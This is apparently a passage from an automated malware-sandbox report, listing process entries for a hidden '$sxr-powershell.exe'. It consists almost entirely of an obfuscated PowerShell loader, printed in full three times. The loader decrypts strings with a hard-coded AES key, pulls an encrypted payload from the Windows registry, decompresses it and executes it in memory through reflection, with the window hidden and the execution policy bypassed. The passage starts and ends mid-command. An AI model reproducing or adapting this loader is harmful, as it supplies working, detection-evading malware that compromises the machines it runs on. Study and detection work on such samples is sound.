'')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:4588
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:3200
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        
        PID:5036
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = 